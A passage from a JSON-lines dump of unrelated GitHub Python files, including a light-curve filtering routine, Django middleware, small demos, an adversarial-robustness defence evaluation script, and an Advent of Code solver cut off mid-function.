used.\r\n\r\n MUST be one of those in lcutils_config.TEXTLC_OUTPUT_COLUMNS\r\n\r\n MUST be any one of the following strings:\r\n\r\n '= ',\r\n '!= ',\r\n '> ',\r\n '< ',\r\n '<= ',\r\n '>= ',\r\n 'between '\r\n\r\n filters that don't meet these rules will be discarded; a warning will be\r\n logged/printed for each one that ends up this way\r\n\r\n '''\r\n\r\n # if the input is an lcdict instead of a HATLC filename, then just use it\r\n # directly\r\n if hatlc_is_dict:\r\n lc = hatlc\r\n else:\r\n lc = read_consolidated_hatlc(hatlc)\r\n\r\n if not isinstance(filters, list):\r\n filters = [x for x in filters]\r\n\r\n where_eval_string = parse_hatlc_filters(filters)\r\n\r\n # make sure that we have at least one filter to apply\r\n if where_eval_string != 'np.where()':\r\n\r\n if LOGGER:\r\n LOGGER.warning('evaling string %s' % where_eval_string)\r\n if DEBUGMODE:\r\n print('lcutils: warning: evaling string %s' % where_eval_string)\r\n\r\n # eval the full np.where expression and get the results\r\n filter_result_indices = eval(where_eval_string)\r\n\r\n # if filter_result_indices has a nonzero length, then use it to filter\r\n # the lightcurve columns\r\n if len(filter_result_indices[0]) > 0:\r\n\r\n for col in lc['cols']:\r\n lc[col] = lc[col][filter_result_indices]\r\n\r\n # amend the ndet key in the LC dict as required\r\n # after the filtering process\r\n lc['ndet'] = len(filter_result_indices[0])\r\n\r\n # amend hatstations key in the LC dict as required after the\r\n # filtering process\r\n if 'STF' in lc and 'NET' in lc:\r\n\r\n nets_and_stations = ['%s%02i' % (x,y) for\r\n (x,y) in zip(lc['NET'], lc['STF'])]\r\n remaining_stations = list(set(nets_and_stations))\r\n lc['hatstations'] = remaining_stations\r\n\r\n else:\r\n # append a warning saying that the station list is out of date\r\n # if the STF column is not present\r\n lc['hatstations'].append('warning: station list is '\r\n 'from original LC since '\r\n 'no STF/NET columns in original LC')\r\n\r\n # amend filters key in the LC dict as required after the filtering\r\n # process\r\n if 'FLT' in lc:\r\n\r\n remaining_filters = np.unique(lc['FLT'])\r\n lc['filters'] = remaining_filters.tolist()\r\n\r\n else:\r\n # append a warning saying that the filter list\r\n # is out of date if the FLT column is not present\r\n # append a warning saying that the station list is out of date\r\n # if the STF column is not present\r\n lc['filters'].append('warning: filter list is '\r\n 'from original LC since '\r\n 'no FLT column in original LC')\r\n\r\n\r\n # generate a filter hash describing what filters were applied\r\n lcfilters_string = [list(x) for x in filters]\r\n lcfilters_string = repr(lcfilters_string)\r\n lcfilterhash = hashlib.md5(lcfilters_string).hexdigest()\r\n\r\n # return a dict if the outtype is none\r\n if outtype is None:\r\n\r\n return (lc, 'filters_ok', lcfilterhash)\r\n\r\n # otherwise, write the actual LC to disk\r\n else:\r\n\r\n outfname = write_consolidated_hatlc(lc,\r\n outtype=outtype,\r\n compress=compress,\r\n outdir=outdir,\r\n filterhash=lcfilterhash)\r\n\r\n return (outfname, 'filters_ok', lcfilterhash)\r\n\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('lcutils.filter_consolidated_hatlc: '\r\n 'applied filters return nothing')\r\n if DEBUGMODE:\r\n print('lcutils.filter_consolidated_hatlc: '\r\n 'applied filters return nothing')\r\n\r\n # generate a filter hash describing what filters were applied\r\n lcfilters_string = [list(x) for x in filters]\r\n lcfilters_string = repr(lcfilters_string)\r\n lcfilterhash = hashlib.md5(lcfilters_string).hexdigest()\r\n\r\n return (hatlc, 'filters_noresults', lcfilterhash)\r\n\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('lcutils.filter_consolidated_hatlc: '\r\n 'no valid filters could be parsed')\r\n if DEBUGMODE:\r\n print('lcutils.filter_consolidated_hatlc: '\r\n 'no valid filters could be parsed')\r\n\r\n return (hatlc, 'filters_invalid', None)\r\n","repo_name":"johnh2o2/rrlyrclassification","sub_path":"lcutils/lcutils_hatlc.py","file_name":"lcutils_hatlc.py","file_ext":"py","file_size_in_byte":37177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"20652762285","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.shortcuts import get_object_or_404\nfrom django.utils import timezone\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils.translation import gettext_lazy as _\n\n\nfrom seance.models import AdvUser\n\n\nclass LogoutIfInActiveMiddleware(MiddlewareMixin):\n @staticmethod\n def process_request(request):\n assert hasattr(request, 'user'), (\n 'The LogoutIfNotActiveMiddleware middleware requires authentication middleware to be installed.'\n )\n if request.user.is_authenticated:\n if request.user.is_superuser or (request.user.last_activity >\n timezone.now() - timezone.timedelta(minutes=5)):\n user = get_object_or_404(AdvUser, pk=request.user.pk)\n user.last_activity = timezone.now()\n user.save()\n request.user.last_activity = user.last_activity\n else:\n logout(request)\n messages.add_message(request, messages.INFO, _('More than 5 minutes inactive. '\n 'Please login again'))\n\n\ndef seance_context_processor(request):\n context = {}\n basket = request.session.get('basket', None)\n last_seance = request.session.get('last_seance', None)\n if basket:\n context['basket'] = basket\n total_price = 0\n for key in basket:\n total_price += float(basket[key]['price'])\n context['total_price'] = total_price\n if last_seance:\n context['last_seance'] = last_seance\n return context\n\n\n","repo_name":"MikeYeromenko/diploma_old","sub_path":"seance/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75251217236","text":"\"\"\"sumary_line\n\nKeyword arguments:\nargument -- description\nReturn: return_description\n\"\"\"\nimport requests\n\nurl = \"https://fakerestapi.azurewebsites.net/api/v1/Activities\"\n\ndata ={\n \"id\": 0,\n \"title\": \"string\",\n \"dueDate\": \"2023-09-02T15:08:55.717Z\",\n \"completed\": True\n}\n\nheaders = {\n 'Content-type': 'application/json; charset = UTF-8'\n}\n\nresponse = requests.post(url, headers=headers, json=data)\nprint(response.text)\n\n\"\"\"\n{\"id\":0,\"title\":\"string\",\"dueDate\":\"2023-09-02T15:08:55.717Z\",\"completed\":true}\nWhat i have done:\nI have take a fake api and tried post with some sample data\nusing requests module in python\n\"\"\"\nfrom bs4 import BeautifulSoup\nurl = \"https://www.google.com/\"\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, \"html.parser\")\nprint(soup.prettify())\n\nfor heading in soup.find_all(\"h2\"):\n print(heading.text)","repo_name":"Aditya-1998k/Python-Tutorial","sub_path":"Day89.py","file_name":"Day89.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18650528033","text":"import pygame\nimport math\nimport time\nimport random\n\nranposx = random.randrange(25,750)\nranposy = random.randrange(25,585)\n\ndef newski(ranx,rany):\n skiobject = [ranx,rany]\n return skiobject\n\nwinx = 800\nwiny = 600\npygame.display.init()\n\nscreen = pygame.display.set_mode((winx,winy))\nred = (255,0,0)\nwhite = (255,255,255)\nblack = (0,0,0)\nrad = 25\nclock = pygame.time.Clock()\n\ndone = False\nskilist = []\nvelocity = [[0.0,0.0]]\ntheta = 0\nfriction = 0.00001\nskilist.append(newski(ranposx,ranposy))\nwhile not done:\n #Update\n dT = clock.tick() / 1000.0\n\n for vobject in velocity:\n #print(vobject)\n if(vobject[0] > 0.0):\n vobject[0] -= friction\n if(vobject[0] < 0.0):\n vobject[0] += friction\n if(vobject[1] > 0.0):\n vobject[1] -= friction\n if(vobject[1] < 0.0):\n vobject[1] += friction\n\n for s in skilist:\n position_vector = [[s[0]+velocity[0][0],s[1]+velocity[0][1]]]\n if(s[0] > winx-rad):\n s[0] = (winx + rad) - s[0]\n\n if(s[1] > winy-rad):\n s[1] = (winy + rad) - s[1]\n\n if(s[0] < rad):\n s[0] = (winx - rad) - s[0]\n\n if(s[1] < rad):\n s[1] = (winy - rad) - s[1]\n\n s[0]+=velocity[0][0]\n s[1]+=velocity[0][1]\n\n #input\n events = pygame.event.get()\n for e in events:\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_ESCAPE:\n done = True\n if e.key == pygame.K_w:\n for ie in velocity:\n ie[1]-=0.1\n if e.key == pygame.K_a:\n for ii in velocity:\n ii[0]-=0.1\n if e.key == pygame.K_d:\n for nie in velocity:\n nie[0]+=0.1\n if e.key == pygame.K_s:\n for m in velocity:\n m[1]+=0.1\n\n screen.fill(black)\n for ski in skilist:\n position_vector = [ [ ski[0]+velocity[0][0]*10,ski[1]+velocity[0][1]*10 ] ]\n pygame.draw.circle(screen,red,(int(ski[0]),int(ski[1])),rad)\n pygame.draw.line(screen,red,ski,(position_vector[0][0],position_vector[0][1]))\n pygame.display.flip()\npygame.display.quit()","repo_name":"Kingcitaldo125/Python-Files","sub_path":"src/skicircle.py","file_name":"skicircle.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40083315612","text":"import sqlite3\n\ndef main():\n con = sqlite3.connect(':memory:')\n cur = con.cursor()\n cur.executescript(\"\"\"\n CREATE TABLE blocks (r INTEGER NOT NULL, c INTEGER NOT NULL);\n CREATE INDEX idx_r_c ON blocks (r, c);\n CREATE INDEX idx_c_r ON blocks (c, r);\n \"\"\")\n\n H, W, rs, cs = map(int, input().split())\n N = int(input())\n for _ in range(N):\n r, c = map(int, input().split())\n cur.execute('INSERT INTO blocks VALUES (?,?)', (r, c))\n Q = int(input())\n r, c = rs, cs\n for _ in range(Q):\n d, l = input().split()\n l = int(l)\n if d == 'R':\n tc = min(c+l, W)\n cur.execute('SELECT c FROM blocks WHERE r = ? AND c BETWEEN ? AND ? ORDER BY c ASC LIMIT 1', (r, c, tc))\n res = cur.fetchone()\n if res:\n c = res[0] - 1\n else:\n c = tc\n elif d == 'L':\n tc = max(c-l, 1)\n cur.execute('SELECT c FROM blocks WHERE r = ? AND c BETWEEN ? AND ? ORDER BY c DESC LIMIT 1', (r, tc, c))\n res = cur.fetchone()\n if res:\n c = res[0] + 1\n else:\n c = tc\n elif d == 'D':\n tr = min(r+l, H)\n cur.execute('SELECT r FROM blocks WHERE c = ? AND r BETWEEN ? AND ? ORDER BY r ASC LIMIT 1', (c, r, tr))\n res = cur.fetchone()\n if res:\n r = res[0] - 1\n else:\n r = tr\n elif d == 'U':\n tr = max(r-l, 1)\n cur.execute('SELECT r FROM blocks WHERE c = ? AND r BETWEEN ? AND ? ORDER BY r DESC LIMIT 1', (c, tr, r))\n res = cur.fetchone()\n if res:\n r = res[0] + 1\n else:\n r = tr\n print(r, c)\n\n\nmain()\n\n","repo_name":"aruma256/kyopro","sub_path":"src/AtCoder/abc273/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28542613150","text":"\"\"\"empty message\n\nRevision ID: 458b59151789\nRevises: b7d09e7e34f4\nCreate Date: 2021-01-16 17:20:49.281514\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '458b59151789'\ndown_revision = 'b7d09e7e34f4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('project', sa.Column('last_edit', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('project', 'last_edit')\n # ### end Alembic commands ###\n","repo_name":"SnSation/PortfolioAPI_FlaskVersion","sub_path":"migrations/versions/458b59151789_.py","file_name":"458b59151789_.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42209733809","text":"import numpy as np\nimport cv2 as cv\n\nfilename = 'catur.jpeg'\nimg = cv.imread(filename)\n\n# Mengubah gambar menjadi grayscale\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n# Mencari titik sudut dengan metode Harris\ngray = np.float32(gray)\ndst = cv.cornerHarris(gray, 2, 3, 0.04)\ndst = cv.dilate(dst, None)\n\n# Mengaplikasikan threshold dan konversi tipe data\nret, dst = cv.threshold(dst, 0.01 * dst.max(), 255, 0)\ndst = np.uint8(dst)\n\n# Mencari centroid\nret, labels, stats, centroids = cv.connectedComponentsWithStats(dst)\n\n# Membuat kriteria untuk pengembangan titik sudut\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 100, 0.001)\ncorners = cv.cornerSubPix(gray, np.float32(centroids), (5, 5), (-1, -1), criteria)\n\n# Menampilkan titik sudut pada gambar\nfor i in range(len(corners)):\n x, y = corners[i]\n cv.circle(img, (int(x), int(y)), 5, (0, 0, 255), -1)\n\n# Menampilkan gambar hasil\ncv.imshow('corners', img)\n\n# Menunggu input keyboard\nif cv.waitKey(0) & 0xff == 27:\n cv.destroyAllWindows()","repo_name":"hilyahkamilGithub99/baru","sub_path":"latihan/baru/dua.py","file_name":"dua.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8024751039","text":"# -*- coding: utf-8 -*-\n# 1054. 距离相等的条形码 https://leetcode.cn/problems/distant-barcodes/\nfrom typing import List\n\n\nclass Solution:\n def rearrangeBarcodes(self, barcodes: List[int]) -> List[int]:\n n, counter = 0, {}\n max_count = 0\n for barcode in barcodes:\n n += 1\n counter[barcode] = counter.get(barcode, 0) + 1\n max_count = max(max_count, counter[barcode])\n even, odd = 0, 1\n half = n // 2\n for x, count in counter.items():\n while 0 < count <= half and odd < n: # 元素出现次数超过数组长度的一半,必须放在偶数下标\n barcodes[odd] = x\n count -= 1\n odd += 2\n while count > 0:\n barcodes[even] = x\n count -= 1\n even += 2\n return barcodes\n\n\nif __name__ == '__main__':\n obj = Solution()\n print(obj.rearrangeBarcodes([1, 1, 1, 1, 2, 2, 3, 3]))\n","repo_name":"code-cold-love/DSProject","sub_path":"leetcode/problems/distant-barcodes.py","file_name":"distant-barcodes.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36834180281","text":"import logging\nimport os\n\nimport numpy as np\n\nfrom aad.basemodels import MnistCnnV2, ModelContainerPT\nfrom aad.datasets import DATASET_LIST, DataContainer\nfrom aad.defences import FeatureSqueezing\nfrom aad.utils import get_data_path\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef build_model_filename(model_name, dataset, epochs):\n return f'{model_name}_{dataset}_e{epochs}.pt'\n\n\ndef build_squeezer_filename(model_name, data_name, max_epochs, filter_name):\n \"\"\"\n Pre-train file example: MnistCnnV2_MNIST_e50_binary.pt\n \"\"\"\n return f'{model_name}_{data_name}_e{max_epochs}_{filter_name}.pt'\n\n\ndef build_adv_filename(model_name, dataset, attack_name):\n return f'{model_name}_{dataset}_{attack_name}_adv.npy'\n\n\nMODEL_NAME = 'MnistCnnV2'\nDATASET = 'MNIST'\nMAX_EPOCHS = 50\nBIT_DEPTH = 8\nSIGMA = 0.2\nKERNEL_SIZE = 3\n\nMODEL_FILE = os.path.join(\n 'save',\n build_model_filename(MODEL_NAME, DATASET, MAX_EPOCHS)\n)\n\n\ndef main():\n # load dataset and initial model\n model = MnistCnnV2()\n dc = DataContainer(DATASET_LIST[DATASET], get_data_path())\n dc(shuffle=True, normalize=True)\n mc = ModelContainerPT(model, dc)\n mc.load(MODEL_FILE)\n accuracy = mc.evaluate(dc.x_test, dc.y_test)\n print(f'Accuracy on test set: {accuracy}')\n\n # train or load pretrained parameters\n squeezer = FeatureSqueezing(\n mc,\n ['median', 'normal', 'binary'],\n bit_depth=BIT_DEPTH,\n sigma=SIGMA,\n kernel_size=KERNEL_SIZE,\n pretrained=True\n )\n\n x_test = dc.x_test\n y_test = dc.y_test\n mc_binary = squeezer.get_def_model_container('binary')\n mc_median = squeezer.get_def_model_container('median')\n mc_normal = squeezer.get_def_model_container('normal')\n\n print('before fit')\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n if not squeezer.does_pretrained_exist(MODEL_FILE):\n squeezer.fit(max_epochs=MAX_EPOCHS, batch_size=128)\n\n print('after fit')\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n squeezer.save(MODEL_FILE, True)\n\n print('after load')\n squeezer.load(MODEL_FILE)\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n # load adversarial examples\n adv_list = ['FGSM', 'BIM', 'DeepFool', 'Carlini', 'Saliency']\n y_file = os.path.join(\n 'save',\n f'{MODEL_NAME}_{DATASET}_{adv_list[0]}_y.npy')\n x_file = os.path.join(\n 'save',\n f'{MODEL_NAME}_{DATASET}_{adv_list[0]}_x.npy')\n x = np.load(x_file, allow_pickle=False)\n y = np.load(y_file, allow_pickle=False)\n acc_og = mc.evaluate(x, y)\n acc_squeezer = squeezer.evaluate(x, y)\n print(f'Accuracy on clean set - OG: {acc_og}, Squeezer: {acc_squeezer}')\n\n for adv_name in adv_list:\n adv_file = os.path.join(\n 'save',\n build_adv_filename(MODEL_NAME, DATASET, adv_name))\n adv = np.load(adv_file, allow_pickle=False)\n acc_og = mc.evaluate(adv, y)\n acc_squeezer = squeezer.evaluate(adv, y)\n print(\n f'Accuracy on {adv_name} set - OG: {acc_og}, Squeezer: {acc_squeezer}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"changx03/adversarial_attack_defence","sub_path":"examples/example_squeezer.py","file_name":"example_squeezer.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"34795327066","text":"\"\"\"\nGiven an integer array nums and an integer k, \nreturn the k most frequent elements. You may return the answer in any order.\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\n\nInput: nums = [1], k = 1\nOutput: [1]\n\"\"\"\n\nnums = [3,0,1,0]\nk = 1\n\ndef topKFrequentElemet(nums, k):\n count = {}\n\n for i in range(len(nums)):\n if nums[i] not in count:\n count[nums[i]] = 1\n else:\n count[nums[i]] +=1 \n count = {k:v for k, v in sorted(count.items(), key=lambda item: item[1], reverse=True)}\n \n ans = []\n for key, _ in count.items():\n ans.append(key)\n\n return ans[:k]\n \n\nprint(\n topKFrequentElemet(nums,1)\n)","repo_name":"iamhimanshu0/Coding-Interview-Preparation","sub_path":"Python_/qus/topKFrequentElemets.py","file_name":"topKFrequentElemets.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"16364052405","text":"import os\nimport shutil\n\nfrom setuptools import find_packages, setup\n\n\ndef main():\n here = os.path.abspath(os.path.dirname(__file__))\n\n # Get the long description from the relevant file\n long_description = \"\"\n try:\n with open(os.path.join(here, \"README.rst\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n except:\n pass\n\n setup(\n name=\"rubaialter\",\n # Versions should comply with PEP440. For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # http://packaging.python.org/en/latest/tutorial.html#version\n version=\"1.1.0b1\",\n description=\"Rubaialter is a module that will perform conversions among these .csv ,.xlsx, .xls, .sqlite3 file formats using Pandas under the hood.\",\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n # The project's main homepage.\n url=\"https://github.com/TechLearnersInc/rubaialter\",\n # Author details\n author=\"Muhammad Sakib Khan Inan\",\n author_email=\"sakib.khaninan@gmail.com\",\n # Choose your license\n license=\"MIT\",\n # Minimum Python version required\n python_requires=\">=3.6\",\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n project_urls={\n \"Source\": \"https://github.com/TechLearnersInc/rubaialter\",\n \"Tracker\": \"https://github.com/TechLearnersInc/rubaialter/issues\",\n \"Facebook\": \"https://www.facebook.com/TechLearnersInc\",\n \"Linkedin\": \"https://www.linkedin.com/company/techlearners/\",\n \"Telegram\": \"https://t.me/TechLearners\",\n },\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Utilities\",\n # Pick your license as you wish (should match \"license\" above)\n \"License :: OSI Approved :: MIT License\",\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n ],\n # What does your project relate to?\n keywords=\"pandas rubaialter csv xls excel xlsx sqlite sqlite3 converter dataset\",\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(),\n # List run-time dependencies here. These will be installed by pip\n # when your project is installed. For an analysis of \"install_requires\"\n # vs pip's requirements files see:\n # https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files\n install_requires=[\"openpyxl\", \"pandas\", \"xlrd\", \"xlwt\"],\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n \"console_scripts\": [\n \"rubaialter=rubaialter:main\",\n ]\n },\n )\n\n # Cleanup\n try:\n shutil.rmtree(\"rubaialter.egg-info\")\n shutil.rmtree(\"build\")\n except Exception:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TechLearnersInc/rubaialter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"8530890601","text":"#!/usr/bin/env pypy3\n\nimport sys\nimport time\n\nDEBUG = sys.argv.count('-v')\n\ndef debug(*args):\n if DEBUG:\n print(*args)\n\ndef parse_input():\n lines = [_.strip('\\r\\n') for _ in sys.stdin]\n hall = list('.. . . . ..')\n rooms = [[] for _ in range(4)]\n for r, c in [(0, 3), (1, 5), (2, 7), (3, 9)]:\n rooms[r].append(lines[2][c])\n rooms[r].append(lines[3][c])\n return rooms, hall\n\n# power per step\npower = {\n 'A': 1,\n 'B': 10,\n 'C': 100,\n 'D': 1000,\n}\n\n# room and position to hall position distances\ndists = {\n # ((room, position), hall spot): distance\n ((0, 0), 0): 3,\n ((0, 0), 1): 2,\n ((0, 0), 3): 2,\n ((0, 0), 5): 4,\n ((0, 0), 7): 6,\n ((0, 0), 9): 8,\n ((0, 0), 10): 9,\n\n ((1, 0), 0): 5,\n ((1, 0), 1): 4,\n ((1, 0), 3): 2,\n ((1, 0), 5): 2,\n ((1, 0), 7): 4,\n ((1, 0), 9): 6,\n ((1, 0), 10): 7,\n\n ((2, 0), 0): 7,\n ((2, 0), 1): 6,\n ((2, 0), 3): 4,\n ((2, 0), 5): 2,\n ((2, 0), 7): 2,\n ((2, 0), 9): 4,\n ((2, 0), 10): 5,\n\n ((3, 0), 0): 9,\n ((3, 0), 1): 8,\n ((3, 0), 3): 6,\n ((3, 0), 5): 4,\n ((3, 0), 7): 2,\n ((3, 0), 9): 2,\n ((3, 0), 10): 3,\n}\n\n# reverse mapping and add additional positions to the rooms\nfor k, v in list(dists.items()):\n x, h = k\n r, p = x\n dists[((r, p+1), h)] = v+1\n dists[((r, p+2), h)] = v+2\n dists[((r, p+3), h)] = v+3\n\n # also reverse mapping\n dists[(h, (r, p))] = v\n dists[(h, (r, p+1))] = v+1\n dists[(h, (r, p+2))] = v+2\n dists[(h, (r, p+3))] = v+3\n\nroom_to_hall = {\n # room: hall left and right in order, break if occupied...\n 0: ([1, 0], [3, 5, 7, 9, 10]),\n 1: ([3, 1, 0], [5, 7, 9, 10]),\n 2: ([5, 3, 1, 0], [7, 9, 10]),\n 3: ([7, 5, 3, 1, 0], [9, 10]),\n}\n\nhall_to_room = {\n # (hall, room): [hall spots to check]\n (0, 0): [1],\n (1, 0): [],\n (3, 0): [],\n (5, 0): [3],\n (7, 0): [5, 3],\n (9, 0): [7, 5, 3],\n (10, 0): [9, 7, 5, 3],\n\n (0, 1): [1, 3],\n (1, 1): [3],\n (3, 1): [],\n (5, 1): [],\n (7, 1): [5],\n (9, 1): [7, 5],\n (10, 1): [9, 7, 5],\n\n (0, 2): [1, 3, 5],\n (1, 2): [3, 5],\n (3, 2): [5],\n (5, 2): [],\n (7, 2): [],\n (9, 2): [7],\n (10, 2): [9, 7],\n\n (0, 3): [1, 3, 5, 7],\n (1, 3): [3, 5, 7],\n (3, 3): [5, 7],\n (5, 3): [7],\n (7, 3): [],\n (9, 3): [],\n (10, 3): [9],\n}\n\n# pod -> destination room\npod_rooms = [('A', 0), ('B', 1), ('C', 2), ('D', 3)]\ndest = dict(pod_rooms)\ndest.update({r: p for p, r in pod_rooms})\n\nclass State:\n def __init__(self, rooms, hall, energy=0):\n self.rooms = [list(_) for _ in rooms]\n self.hall = list(hall)\n self.energy = energy\n self.last = None\n\n def get(self, pos):\n if isinstance(pos, tuple):\n return self.rooms[pos[0]][pos[1]]\n return self.hall[pos]\n\n def set(self, pos, v):\n if isinstance(pos, tuple):\n self.rooms[pos[0]][pos[1]] = v\n else:\n self.hall[pos] = v\n\n def move(self, start, end):\n # move (swap) start/end, add cost of this to energy\n pod = self.get(start)\n self.energy += dists[(start, end)] * power[pod]\n tmp = self.get(end)\n assert tmp == '.'\n self.set(end, self.get(start))\n self.set(start, tmp)\n\n def copy(self):\n s = State(self.rooms, self.hall, self.energy)\n s.last = self\n return s\n\n def print(self):\n print('#' * (len(self.hall)+2), self.energy)\n print('#' + ''.join(self.hall) + '#')\n for i in range(len(self.rooms[0])):\n print('###' + '#'.join(_[i] for _ in self.rooms) + '###')\n print('#############')\n\n def finished(self):\n for pod, r in pod_rooms:\n if any(_ != pod for _ in self.rooms[r]):\n return False\n return True\n\n def could_solve(self):\n for pod, r in pod_rooms:\n if any(_ not in ('.', pod) for _ in self.rooms[r]):\n return False\n return True\n\n def best_score(self):\n # best we could score if we could place everything\n score = self.energy\n for h, c in enumerate(self.hall):\n if c not in ('.', ' '):\n end = (dest[c], 0)\n score += dists[(h, end)] * power[c]\n return score\n\n def hash(self):\n return hash((tuple(tuple(_) for _ in self.rooms), tuple(self.hall)))\n\n_last = time.time()\nvisited = {}\n\ndef dfs(state, best):\n global _last\n if DEBUG and time.time() - _last > 5:\n _last = time.time()\n print(best[0] and best[0].energy)\n state.print()\n print()\n\n if state.finished():\n if not best[0] or state.energy < best[0].energy:\n best[0] = state\n return\n\n h = state.hash()\n if h in visited and visited[h] < state.energy:\n return\n visited[h] = state.energy\n\n # costly\n if 'D' in state.hall[:4]:\n return\n\n # impossible to solve\n for d, a in [(3, 5), (5, 7), (3, 7)]:\n if state.hall[d] == 'D' and state.hall[a] == 'A':\n return\n for d, b in [(5, 7)]:\n if state.hall[d] == 'D' and state.hall[b] == 'B':\n return\n for c, a in [(3, 5)]:\n if state.hall[c] == 'C' and state.hall[a] == 'A':\n return\n\n if best[0]:\n # if used energy > best\n if state.energy > best[0].energy:\n return\n\n # if rooms are clear of other pods and best we could do > best found\n if state.could_solve() and state.best_score() > best[0].energy:\n return\n\n # can we put a pod into a room? Push state for every pod we could place\n # in a room...\n for h, pod in enumerate(state.hall):\n if pod in dest:\n r = dest[pod]\n\n # path clear to room\n if any(state.hall[_] != '.' for _ in hall_to_room[(h, r)]):\n continue\n\n room = state.rooms[r]\n if all(_ in ('.', pod) for _ in room):\n p = len(room) - 1\n while room[p] == pod:\n p -= 1\n\n s = state.copy()\n s.move(h, (r, p))\n dfs(s, best)\n\n # take a pod out into any one of the free spots in the hall if possible\n for r, room in enumerate(state.rooms):\n pod = dest[r]\n if any(_ in 'ABCD' and _ != pod for _ in room):\n p = 0\n while room[p] == '.':\n p += 1\n\n for dir in (0, 1):\n for h in room_to_hall[r][dir]:\n if state.hall[h] != '.':\n break\n\n s = state.copy()\n s.move((r, p), h)\n dfs(s, best)\n\n\ndef part1(rooms, hall):\n state = State(rooms, hall)\n if DEBUG:\n state.print()\n\n best = [None]\n dfs(state, best)\n best = best[0]\n\n if DEBUG:\n s = best\n L = []\n while s:\n L.append(s)\n s = s.last\n\n L.reverse()\n for s in L:\n s.print()\n print()\n\n print(best.energy)\n\ndef part2(rooms, hall):\n # splice new data into rooms between first and second row\n\n #D#C#B#A#\n #D#B#A#C#\n\n visited.clear()\n\n for r, s in enumerate(['DD', 'CB', 'BA', 'AC']):\n for c in s:\n 